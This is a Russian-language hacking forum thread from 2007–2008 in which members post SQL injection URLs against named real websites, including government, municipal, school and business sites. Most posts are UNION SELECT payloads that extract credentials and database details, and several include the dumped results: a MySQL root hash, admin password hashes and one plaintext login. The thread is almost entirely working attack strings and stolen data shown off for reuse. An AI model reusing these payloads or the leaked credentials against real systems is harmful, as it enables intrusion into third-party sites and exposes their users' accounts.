SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. netpingx

    netpingx New Member

    Joined:
    13 Dec 2007
    Messages:
    2
    Likes Received:
    3
    Reputations:
    0
    http://www.mysql-hispano.org/page.php?id=3+UNION+SELECT+1,2,3,4,5+from+hispano.users/*
     
    1 person likes this.
  2. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://www.buggenhout.be/

    Code:
    http://www.buggenhout.be/dienst.asp?id=1+or+1=(SELECT+TOP+1+cast(USERNAME+as+nvarchar)%2B%27%3A%27%2Bcast(PASSWORD+as+nvarchar)+from+SEC_USER)--
    http://www.brecht.be/

    Code:
    http://www.brecht.be/dienst.asp?id=1+or+1=(SELECT+TOP+1+cast(USERNAME+as+nvarchar)%2B%27%3A%27%2Bcast(PASSWORD+as+nvarchar)+from+SEC_USER)--
     
  3. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    http://www.dynamomania.com

    http://www.dynamomania.com

    http://www.dynamomania.com/news.php?p=message&id=-31370+union+select+1,2,3,concat_ws(char(58),name,pwd,email),5,6+from+users/*
     
    #4343 Tigger, 6 Jan 2008
    Last edited: 14 Sep 2011
  4. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    http://www.greenshift.com/

    http://www.greenshift.com/

    http://www.greenshift.com/news.php?id=-97+union+select+1,concat(user,char(58),password),3,4,5,6,7,8,9,10,11,12+from+mysql.user/*

    root:*3AE51E09E8B6540D267826C97259B607120DB332
     
    #4344 Tigger, 6 Jan 2008
    Last edited: 14 Sep 2011
    2 people like this.
  5. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    http://www.milim.com/news.php?id=-100+union+select+1,2,3,4,5,6,7,8/*

    Таблицы подобрать не смог((
     
  6. .Begemot.

    .Begemot. Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    chicken.org.au

    HTML:
    http://www.chicken.org.au/page.php?id=-4+union+select+0,1,2,3,4,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),6,7,8,9,10,11,12/*
    USER:[email protected]
    VERSION:4.0.24-nt-max-log
    DATABASE:vs28054_1

    HTML:
    http://www.chicken.org.au/page.php?id=-4+union+select+0,1,2,3,4,concat(id,0x3a,login,0x3a,password),6,7,8,9,10,11,12+from+users/*
    Таблица - users
    Поля - id,login,password

    13:Sarah:sanchez
     
    1 person likes this.
  7. А®ТеS

    А®ТеS Active Member

    Joined:
    25 Nov 2006
    Messages:
    198
    Likes Received:
    193
    Reputations:
    41
    Правительство Австралии xD. Au
     
    1 person likes this.
  8. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://www.tuner.be/

    вывод в тайтле

    Code:
    http://www.tuner.be/actu.asp?id=-1+union+select+1,2,3,convert(concat_ws(0x3a,user(),database(),version())+using+latin1),5,6,7,8,9,10,11,12,13/*
     
    1 person likes this.
  9. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    www.a2k.org.ua

    http://www.a2k.org.ua

    http://www.a2k.org.ua/news.php?id=-1567+union+select+1,2,3,4,concat_ws(char(58),user,password,email),6,7,8,9,10,11,12,13,14,15,16,17,18,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+users+limit+1,0/*&lng=ua


    admin:d23d8b79f575bcc0eedfb8c4e2f13540:repz
     
    #4349 Tigger, 6 Jan 2008
    Last edited: 14 Sep 2011
    1 person likes this.
  10. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    www.voladm.gov.ua

    http://www.voladm.gov.ua

    http://www.voladm.gov.ua/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat(login,char(58),pass),12,13,14+from+users+limit+2,50/*&today=2006.01.24&lang=ukr

    Roma:4cb3ab8dc96cc4bb7a5ccd4bb8b57199:gh237


    пароли не знаю от чего...
     
  11. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    http://www.bikeshop.com.ua/news.php?id=-9+union+select+1,2,3,4,5+from+admin/*
     
    #4351 Tigger, 6 Jan 2008
    Last edited: 14 Sep 2011
  12. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    http://missinternet.kiev.ua/news.php?id=-16+union+select+1,2,3,4,5,6,7+from+mysql.users/*
     
    #4352 Tigger, 6 Jan 2008
    Last edited: 14 Sep 2011
  13. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Tigger,

     
  14. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Tigger,

     
    2 people like this.
  15. .Begemot.

    .Begemot. Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    laurenceschool.com

    HTML:
    http://www.laurenceschool.com/page.php?id=-13+union+select+1,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+using+latin1)/*&title=Links
    USER:[email protected]
    VERSION:4.1.11-Debian_4sarge7
    DATABASE:laurenceschool_com_-_base

    dalelane.co.uk

    Microsoft Access

    Ни одной стандартной таблици :(
    Только раскрытие путей и 13 столбцов.

    HTML:
    http://dalelane.co.uk/page.php?id=918+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12+from+msysobjects+in+'.'
     
    3 people like this.
  16. Xszz

    Xszz Elder - Старейшина

    Joined:
    23 Apr 2007
    Messages:
    141
    Likes Received:
    42
    Reputations:
    9
    Code:
    http://www.mwh.gov.bh/Tnews.php?id=11+UNION+SELECT+1,user,password,4,5,6,7+FROM+users/*
    
     
    1 person likes this.
  17. LAEOT

    LAEOT Member

    Joined:
    6 Jan 2008
    Messages:
    8
    Likes Received:
    6
    Reputations:
    0
    Вопрос про sql-injection.

    Вот недавно проверял один сайт и вроде бы нашол sql injection.

    Вот 2 примера из сайта:
    1. я набрал этот url :
    http://www.site.com/script.php?file=2-1'

    Получил ответ :

    Warning: imagecreatefromjpeg() [function.imagecreatefromjpeg]: Unable to access 2-1 in /home/site.com/script.php on line 3

    Warning: imagecreatefromjpeg(2-1) [function.imagecreatefromjpeg]: failed to open stream: No such file or directory in /home/site.com/script.php on line 3

    Warning: imagesx(): supplied argument is not a valid Image resource in /home/site.com/script.php on line 4

    Warning: imagesy(): supplied argument is not a valid Image resource in /home/site.com/script.php on line 5

    Warning: imagecopyresized(): supplied argument is not a valid Image resource in /home/site.com/script.php on line 23

    Warning: imagedestroy(): supplied argument is not a valid Image resource in /home/site.com/script.php on line 25
    -------------------- это первый пример
    вопросы от меня:
    1. есть ли sql injection?
    2. если да,то можете пример дать?
    info: што в красном цвете,это текст который я водил в url (2-1')
    --------------------
    Второй пример:
    http://www.site.com/forum.php?id=4686&start=20'
    Ответ:
    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/site.com/forum.php on line 439
    ------------------
    вопросы от меня:
    1. есть ли sql injection?
    2. если да,то можете пример дать?

    Зарание спасибо за ответы!
     
  18. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    laeot не флуди !!!
    иди в другую тему !!!
     
  19. Xszz

    Xszz Elder - Старейшина

    Joined:
    23 Apr 2007
    Messages:
    141
    Likes Received:
    42
    Reputations:
    9
    Code:
    http://russian.tebyan.net/Sites/default.php?id=-5898+UNION+SELECT+1,concat(user,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15+FROM+mysql.user/*
    
     
    2 people like this.
  20. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    www.centurymedia.com

    http://www.centurymedia.com/


    http://www.centurymedia.com/us/news.php?artist_ID=-31+union+select+1,2,3,user,5,6+from+mysql.user/*
     
    #4360 Tigger, 6 Jan 2008
    Last edited: 14 Sep 2011
    2 people like this.
Thread Status:
Not open for further replies.